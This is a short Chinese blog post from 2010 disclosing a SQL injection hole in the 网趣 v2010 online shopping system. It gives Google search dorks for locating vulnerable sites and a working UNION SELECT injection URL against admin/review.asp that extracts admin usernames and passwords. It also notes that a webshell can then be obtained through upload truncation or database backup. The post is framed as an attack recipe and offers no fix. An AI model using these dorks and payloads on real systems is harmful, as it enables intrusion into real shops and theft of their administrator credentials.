网趣网上购物系统HTML静态版 v2010 注射

2010, April 15, 9:38 AM. 漏洞分析
Submitted by admin

影响版本:网趣网上购物系统HTML静态版 v2010

漏洞描述:

Google关键字:inurl:buy.asp?action=show
或者:inurl:viewreturn.asp?Page=1

注射代码:

admin/review.asp?id=50%20and%201=2%20union%20select%201,2,admin,4,password,6,7,8,9,10,11%20from%20admin


自己重新查询下表,或者用工具注入

后台拿SHELL很简单的,上传截断,数据库备份都可以的。

Tags: 网趣

« 上一篇 | 下一篇 »

只显示10条记录相关文章
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):